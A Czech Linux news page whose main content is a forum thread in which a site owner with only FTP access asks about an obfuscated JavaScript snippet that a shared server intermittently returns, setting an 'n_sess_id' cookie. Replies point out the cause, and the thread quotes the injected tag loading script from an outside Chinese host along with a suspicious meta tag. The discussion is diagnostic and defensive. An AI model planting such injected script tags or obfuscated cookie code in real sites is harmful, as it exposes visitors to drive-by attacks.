Byla vydána nová verze 2.47.0 distribuovaného systému správy verzí Git. Přispělo 83 vývojářů, z toho 28 nových. Přehled novinek v příspěvku na blogu GitHubu a v poznámkách k vydání.
Bylo vydáno OpenBSD 7.6. Opět bez písničky.
Programovací jazyk Python byl vydán v nové major verzi 3.13.0. Podrobný přehled novinek v changelogu.
Lze získat roota pouze se zapalovačem? Ano, lze.
Konference LinuxDays 2024 proběhne již tento víkend 12. a 13. října v Praze. Na programu je spousta zajímavých přednášek a workshopů, zástup zajímavých osobností a stánky řady projektů: Fedora, openSUSE, vpsFree.cz, Mozilla, brmlab, OpenAlt a mnoho dalších. Vstup zdarma.
Představeny byly oficiální Raspberry Pi microSD karty třídy A2 a silikonový kryt na Raspberry Pi 5.
OpenRazer byl vydán ve verzi 3.9.0. Jedná se o svobodný software, ovladač a démon, umožňující nastavovat klávesnice, notebooky, myši, podložky pod myš, keypady, sluchátka a další zařízení od společnosti Razer na GNU/Linuxu.
Byla vydána verze 3.6 multiplatformního integrovaného vývojového prostředí (IDE) pro rychlý vývoj aplikaci (RAD) ve Free Pascalu Lazarus (Wikipedie). Přehled novinek v poznámkách k vydání. Využíván je Free Pascal Compiler (FPC) 3.2.2.
Na čem aktuálně pracují vývojáři GNOME a KDE? Pravidelný přehled novinek v Týden v GNOME a Týden v KDE.
Byla vydána nová verze 8.8 multiplatformní digitální pracovní stanice pro práci s audiem (DAW) Ardour. Přehled oprav, vylepšení a novinek v oficiálním oznámení.
Chci se poradit, jestli se někdo s něčím podobným nesetkal, než začnu urgovat správce serveru.
Nepravidelně se stává, že při přístupu na web běžícím na jednom serveru se místo požadovaného obsahu vrátí jen krátký javascript:
<script type="text/javascript" language="javascript"> var lclbi=new Date( ); lclbi.setTime(lclbi.getTime( )+014*074*074*01750); document.cookie="n\x5f\x73e\x73\x73\x5f\x69\x64\x3d\x38dbd07\x33\x64c24b\x64\x378\x32\x31c\x33\x35\x34\x332\x37\x35\x33032ef\x62"+"\x3b\x20pat\x68\075\x2f; \x65xpir\x65s="+lclbi.toGMTString( ); </script>
Dekódované je to:
<script type="text/javascript" language="javascript"> var lclbi=new Date( ); lclbi.setTime(lclbi.getTime( )+014*074*074*01750); document.cookie="
n_sess_id=8dbd073dc24bd7821c35432753032efb; path=/; expires="
+lclbi.toGMTString( ); </script>
Občas je to k vidění např. na http://www.smaltovna.cz/ ale stejně se chovají další weby na stejném serveru jak už jsem psal.
Kdysi jsme řešily podobný problém a při googlení jsem narazil na dokument http://bt.uptime.cz/apache/apache_attack_EN.pdf který něco takového popisuje, ale toto mi přijde trochu jiné.
Na dotaz "n_sess_id" google mlčí, proto se ptám zde. Server sdělí akorát verzi Apache/2.0.5.
Soubory webu se zadjí být nezměněny, problém s ukradenýmy hesly z TCM jsme už řešili, toto bude něco jiného.
Máte někdo s podobnými problémy nějaké zkušenosti? Předem děkuju za jakoukoliv odpověď.
Připomínám že nejsem správcem serveru, mám jen ftp přístup, jde o osobní zvědavost a o to, co správci napsat (kromě "Máš to rozbitý" )
Len tak cisto zo zaujmu som pozrel na tu stranku smaltovna.cz a ejhle,cista prazdna strana mrknem na zdrojak a ten javascript je tam,pri reloade uz isla stranka normalne. Pozrel som zdrojak stranok,prve mi padlo do oci nejaky javascript co sa natahuje s nejakeho cinskeho servevera a potom este nejaky emonitor.cz alebo co,nemoze byt chyba tam ? Neskusal si najprv odmazat tie javascripty a tak skusat ci sa objavy ta zahada ? Sice sa v javascripte moc nevyznam ani ho nemam rad,ale tenot kus kodu mi nejak pripomina skor akesi pocitanie statistiky,alebo nieco podobne...
Díky za nápady, vloženého
<!-- ad --><script type="text/javascript" src="http://jpchase.cn/js.js"></script><!-- /ad -->
na začátku body a
<meta name="verify-v1" content="52mbi00Wp0KQDBlEVaghU25iPjp3aQoCBGLS+fpVd68=" />
v hlavičce jsem si nevšiml (odstraněno), bohužel ostatní weby jsou bez toho ale se stejným problémem.
Běžící procesy si prohlédnout nemůžu, mám jen ftp přístup, ale přesměruji nápad adminovi.
Díky
Tiskni Sdílej: